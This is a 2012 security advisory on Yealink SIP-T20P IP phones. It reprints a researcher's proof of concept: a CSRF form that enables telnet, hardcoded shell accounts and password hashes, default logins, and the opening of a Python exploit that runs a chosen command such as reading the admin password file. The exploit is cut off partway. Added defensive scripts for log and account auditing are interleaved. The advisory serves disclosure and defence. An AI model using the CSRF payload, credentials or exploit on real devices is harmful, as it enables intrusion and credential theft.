Published: 2012-12-21
Updated: 2012-12-24
Affected systems:
Yealink SIP-T20P IP Phone <=9.70.0.100
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57029
The Yealink SIP-T20P is an IP phone.
YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 contains multiple security-bypass, buffer-overflow and cross-site request forgery vulnerabilities. An attacker can exploit them to execute arbitrary code or bypass certain security restrictions and perform unauthorized operations.
The vulnerabilities are summarized as follows:
1) The default username ("user") and password ("user") give access to the hidden page <IP>/cgi-bin/ConfigManApp.com?Id=10, which contains the option to enable Telnet.
2) The firmware contains hardcoded telnet shell usernames and passwords; the file "/tmp/.htpasswd" contains the password of the web interface "admin" user and is world-readable.
3) A cross-site request forgery vulnerability exists.
4) The /yealink/bin/macd process listening on port 12345 has a buffer overflow vulnerability.
See the PoC published by xistence for details.
<*Source: xistence (xistence@0x90.nl)
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Users bear the risk themselves!
xistence (xistence@0x90.nl) provided the following test method:
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities
# Date : 12-21-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : ?ProductsID=64&CateID=187&flag=142
# Vendor site :
# Version : 9.70.0.100 and lower
# Tested on : YeaLink IP Phone SIP-T20P (hardware VoIP phone)
#
# Vulnerability : Multiple Vulnerabilities as described below
#
#+--------------------------------------------------------------------------------------------------------------------------------+
[0x01] - Hidden page to enable telnet + CSRF
The hidden page <IP>/cgi-bin/ConfigManApp.com?Id=10 contains an option to enable Telnet on the phone. Only the "admin" user can access this page.
However the unprivileged user "user" can post directly to ConfigManApp.com and enable Telnet. This default user "user" has the password "user" and is unlikely to be changed by a user.
Also CSRF to enable this is possible:
<html>
<head>
<title>Enable Telnet</title>
</head>
<body>
<form action="http://<IP>/cgi-bin/ConfigManApp.com" method="post">
<input type="hidden" value="10"/>
<input type="hidden" value="1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"/>
</form>
<script> document.csrf.submit(); </script>
</body>
</html>
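The script below is an added example for this section; it is not part of xistence's advisory or of Yealink's software. From the defender's side, the two abuses described here leave a recognisable trace in the phone's web-server access log: a hit on the hidden ConfigManApp.com page with Id=10, and a POST to ConfigManApp.com whose Referer is not the phone itself (a CSRF page such as the one above is loaded from some other origin, and a scripted post often carries no Referer at all). The log lines are constructed, and the "combined" log format is an assumption, since the phone's real log format is not on the page.

```python
"""Scan a web-interface access log for the hidden telnet page and for
configuration POSTs that do not come from the phone's own pages.
Assumptions (not from the advisory): Apache/nginx 'combined' log format
and a Referer header present on same-site browser form posts."""

import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log; 192.168.1.10 plays the phone, 192.168.1.20 a browser.
SAMPLE_LOG = """\
192.168.1.20 - - [21/Dec/2012:10:00:01 +0100] "GET /cgi-bin/ConfigManApp.com?Id=1 HTTP/1.1" 200 512 "http://192.168.1.10/cgi-bin/ConfigManApp.com?Id=0" "Mozilla/5.0"
192.168.1.20 - - [21/Dec/2012:10:00:07 +0100] "GET /cgi-bin/ConfigManApp.com?Id=10 HTTP/1.1" 200 731 "http://192.168.1.10/cgi-bin/ConfigManApp.com?Id=1" "Mozilla/5.0"
192.168.1.20 - - [21/Dec/2012:10:01:15 +0100] "POST /cgi-bin/ConfigManApp.com HTTP/1.1" 302 0 "http://attacker.example/telnet.html" "Mozilla/5.0"
192.168.1.20 - - [21/Dec/2012:10:02:00 +0100] "POST /cgi-bin/ConfigManApp.com HTTP/1.1" 302 0 "http://192.168.1.10/cgi-bin/ConfigManApp.com?Id=10" "Mozilla/5.0"
192.168.1.20 - - [21/Dec/2012:10:02:30 +0100] "POST /cgi-bin/ConfigManApp.com HTTP/1.1" 302 0 "-" "curl/7.27.0"
"""

# 'combined' format: src ident user [ts] "METHOD target proto" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

CONFIG_APP = "/cgi-bin/ConfigManApp.com"
HIDDEN_TELNET_ID = "10"   # page id named in the advisory


def referer_host(referer):
    """Host part of a Referer URL, or None when the header is absent ("-")."""
    if not referer or referer == "-":
        return None
    return urlsplit(referer).hostname


def audit_log(text, phone_host):
    """Return (finding, source_ip, timestamp) tuples for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines in another format
        parts = urlsplit(m["target"])
        if parts.path != CONFIG_APP:
            continue
        if parse_qs(parts.query).get("Id") == [HIDDEN_TELNET_ID]:
            findings.append(("hidden-telnet-page", m["src"], m["ts"]))
        # A form post to the config handler should originate from the phone's
        # own pages; any other origin, or no Referer at all, is worth a look.
        if m["method"] == "POST" and referer_host(m["referer"]) != phone_host:
            findings.append(("config-post-no-same-origin-referer", m["src"], m["ts"]))
    return findings


if __name__ == "__main__":
    for finding in audit_log(SAMPLE_LOG, "192.168.1.10"):
        print(*finding)
```

Run it against a real log with the phone's own address as `phone_host`; the second and fifth sample lines are the ones that warrant follow-up, the fourth is a legitimate same-origin post from the (hidden) page itself.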
[0x02] - Default telnet shell users + passwords
The shell users are hardcoded in the firmware images and are always the same and can't be changed through the webinterface. So after enabling telnet through the hidden page shell access could go unnoticed.
/etc/passwd:
root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:501:501:Guest,,,:/:/bin/sh
/etc/shadow:
root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: <- password is "guest"
/etc/group:
root:x:0:admin,root
guest:x:1:guest
The file "/tmp/.htpasswd" is world readable and contains the "admin" password for the web interface.
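An added example for this section, not part of the advisory or of the phone's firmware: an audit routine that flags, from an extracted firmware image or from files copied off a device, the conditions described above. It parses the passwd, shadow and group files printed in the advisory, reports every account that has a login shell and an active (unlocked) password hash, reports extra members of the root group, and checks whether listed files such as /tmp/.htpasswd are readable by everyone. The account samples are the ones shown above; the temporary-file helper stands in for a real device path.

```python
"""Audit firmware account databases and sensitive-file permissions.
The passwd/shadow/group text below is copied from the advisory; the
file-mode check takes arbitrary paths and uses a temporary file in the
demo so it runs offline."""

import os
import stat
import tempfile

PASSWD = """\
root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:501:501:Guest,,,:/:/bin/sh
"""
SHADOW = """\
root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
"""
GROUP = """\
root:x:0:admin,root
guest:x:1:guest
"""

# Shells that do not give an interactive session.
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}


def parse_colon_file(text):
    """Split a passwd/shadow/group style file into field lists."""
    return [line.split(":") for line in text.splitlines()
            if line and not line.startswith("#")]


def audit_accounts(passwd_text, shadow_text, group_text):
    """Return (user, reason) pairs for accounts that grant shell access."""
    findings = []
    hashes = {row[0]: row[1] for row in parse_colon_file(shadow_text)}
    for name, _pw, uid, _gid, _gecos, _home, shell in parse_colon_file(passwd_text):
        h = hashes.get(name, "")
        # An empty, "!" or "*" hash field cannot authenticate by password.
        enabled = bool(h) and not h.startswith(("!", "*"))
        if enabled and shell not in NOLOGIN_SHELLS:
            findings.append((name, "interactive shell with a fixed password hash"))
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account besides root"))
    for _gname, _x, gid, members in parse_colon_file(group_text):
        if gid == "0":
            for member in filter(None, members.split(",")):
                if member != "root":
                    findings.append((member, "member of the root group"))
    return findings


def world_readable(path):
    """True if 'others' have read permission on the path (mode o+r)."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def check_sensitive_files(paths):
    """Return the subset of paths that exist and are world-readable."""
    return [p for p in paths if os.path.exists(p) and world_readable(p)]


def demo_world_readable(mode):
    """Create a temp file with the given mode and report the check result."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        name = tmp.name
    try:
        os.chmod(name, mode)
        return world_readable(name)
    finally:
        os.unlink(name)


if __name__ == "__main__":
    for user, reason in audit_accounts(PASSWD, SHADOW, GROUP):
        print("%-6s %s" % (user, reason))
    # On a device, pass real paths, e.g. ["/tmp/.htpasswd", "/etc/shadow"].
    print("world-readable demo (0644):", demo_world_readable(0o644))
```

On the advisory's files this reports root, admin and guest as shell accounts with fixed hashes and admin as an extra root-group member; the permission check is what would flag /tmp/.htpasswd when run on the device itself.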
[0x03] - Exploit
The following exploit logs in with the unprivileged user "user" and password "user" in the web interface. Here it enables telnet, logs in with the default user "guest" and password "guest" and executes the shell command specified.
An example is to do a "cat /tmp/.htpasswd" to retrieve the admin password for the web interface.
#!/usr/bin/python
import urllib, urllib2, getpass, sys, telnetlib
print ""
print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 hidden page telnet enabler + default guest shell account command execution - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
print ""
if (len(sys.argv) != 3):
    print "[*] Usage: " + sys.argv[0] + " <IP of Phone> <command to execute>"
    print "[*] i.e.: " + sys.argv[0] + " 127.0.0.1 \"cat /tmp/.htpasswd\""
    print ""
    exit(0)
phoneIP = sys.argv[1]
shellCmd = sys.argv[2]
phoneUrl = 'http://%s/cgi-bin/ConfigManApp.com' % phoneIP
webUser = 'user'
webPass = 'user'
telnetUser = 'guest'
telnetPass = 'guest'